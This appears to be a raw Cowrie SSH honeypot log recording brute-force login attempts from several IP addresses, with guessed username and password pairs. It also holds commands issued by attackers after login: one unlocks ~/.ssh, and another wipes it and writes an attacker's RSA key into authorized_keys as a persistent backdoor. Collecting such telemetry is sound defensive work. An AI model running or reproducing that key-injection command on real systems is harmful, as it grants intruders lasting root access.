{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.389832Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.390715Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.428299Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:37:56.951794Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.952588Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.990526Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:56.991429Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":35078,"dst_ip":"1.2.3.4","dst_port":22,"session":"382e55fd18cc","protocol":"ssh","message":"New connection: 82.67.125.95:35078 (1.2.3.4:22) [session: 382e55fd18cc]","sensor":"my-vps","timestamp":"2025-08-31T01:37:57.025432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:37:57.026500Z","src_ip":"82.67.125.95","session":"382e55fd18cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:37:57.062185Z","src_ip":"82.67.125.95","session":"382e55fd18cc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:37:57.244381Z","src_ip":"82.67.125.95","session":"382e55fd18cc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.282971Z","src_ip":"82.67.125.95","session":"382e55fd18cc"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":35094,"dst_ip":"1.2.3.4","dst_port":22,"session":"118d35b34a4f","protocol":"ssh","message":"New connection: 82.67.125.95:35094 (1.2.3.4:22) [session: 118d35b34a4f]","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.318004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.318975Z","src_ip":"82.67.125.95","session":"118d35b34a4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.354823Z","src_ip":"82.67.125.95","session":"118d35b34a4f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.539297Z","src_ip":"82.67.125.95","session":"118d35b34a4f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.577101Z","src_ip":"82.67.125.95","session":"ea3db7070f9a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:37:58.578105Z","src_ip":"82.67.125.95","session":"118d35b34a4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36422,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee4dd01e2eda","protocol":"ssh","message":"New connection: 212.227.125.160:36422 (1.2.3.4:22) [session: ee4dd01e2eda]","sensor":"my-vps","timestamp":"2025-08-31T01:38:09.294159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:38:09.990067Z","src_ip":"212.227.125.160","session":"ee4dd01e2eda"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:38:09.990877Z","src_ip":"212.227.125.160","session":"ee4dd01e2eda"}
{"eventid":"cowrie.login.failed","username":"docker","password":"12345","message":"login attempt [docker/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:11.968680Z","src_ip":"212.227.125.160","session":"ee4dd01e2eda"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:38:13.539026Z","src_ip":"212.227.125.160","session":"ee4dd01e2eda"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":63098,"dst_ip":"1.2.3.4","dst_port":22,"session":"d06773976a34","protocol":"ssh","message":"New connection: 80.94.95.15:63098 (1.2.3.4:22) [session: d06773976a34]","sensor":"my-vps","timestamp":"2025-08-31T01:38:15.325485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:38:15.326208Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:38:15.377429Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:15.665107Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abc123","message":"login attempt [squid/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:16.730963Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abcd123","message":"login attempt [squid/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:17.800407Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abcd1234","message":"login attempt [squid/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:18.853234Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.login.failed","username":"squid","password":"abc1234","message":"login attempt [squid/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:19.907175Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:38:20.960157Z","src_ip":"80.94.95.15","session":"d06773976a34"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":34820,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a729f80c6a6","protocol":"ssh","message":"New connection: 115.190.94.119:34820 (1.2.3.4:22) [session: 1a729f80c6a6]","sensor":"my-vps","timestamp":"2025-08-31T01:38:38.707605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:38:38.708645Z","src_ip":"115.190.94.119","session":"1a729f80c6a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:38:38.905640Z","src_ip":"115.190.94.119","session":"1a729f80c6a6"}
{"eventid":"cowrie.login.success","username":"root","password":"123@abc","message":"login attempt [root/123@abc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:38:39.755771Z","src_ip":"115.190.94.119","session":"1a729f80c6a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56786,"dst_ip":"1.2.3.4","dst_port":22,"session":"67a75474f5a5","protocol":"ssh","message":"New connection: 212.227.235.229:56786 (1.2.3.4:22) [session: 67a75474f5a5]","sensor":"my-vps","timestamp":"2025-08-31T01:38:49.286519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:38:49.979995Z","src_ip":"212.227.235.229","session":"67a75474f5a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:38:49.981047Z","src_ip":"212.227.235.229","session":"67a75474f5a5"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":41384,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d1375f0dbf3","protocol":"ssh","message":"New connection: 82.67.125.95:41384 (1.2.3.4:22) [session: 9d1375f0dbf3]","sensor":"my-vps","timestamp":"2025-08-31T01:38:55.490476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:38:55.491412Z","src_ip":"82.67.125.95","session":"9d1375f0dbf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:38:55.521813Z","src_ip":"82.67.125.95","session":"9d1375f0dbf3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"adminqwe","message":"login attempt [admin/adminqwe] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:55.684283Z","src_ip":"82.67.125.95","session":"9d1375f0dbf3"}
{"eventid":"cowrie.login.failed","username":"docker","password":"1234567","message":"login attempt [docker/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:38:56.044019Z","src_ip":"212.227.235.229","session":"67a75474f5a5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:38:56.717422Z","src_ip":"82.67.125.95","session":"9d1375f0dbf3"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:38:57.845730Z","src_ip":"212.227.235.229","session":"67a75474f5a5"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49752,"dst_ip":"1.2.3.4","dst_port":22,"session":"80f620e3509d","protocol":"ssh","message":"New connection: 102.88.137.80:49752 (1.2.3.4:22) [session: 80f620e3509d]","sensor":"my-vps","timestamp":"2025-08-31T01:39:05.033538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:39:05.034565Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:39:05.157254Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456..","message":"login attempt [root/AA123456..] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:39:05.688519Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:39:05.956498Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:39:05.957311Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:39:05.958169Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:39:06.081943Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:39:06.398984Z","src_ip":"102.88.137.80","session":"80f620e3509d"}
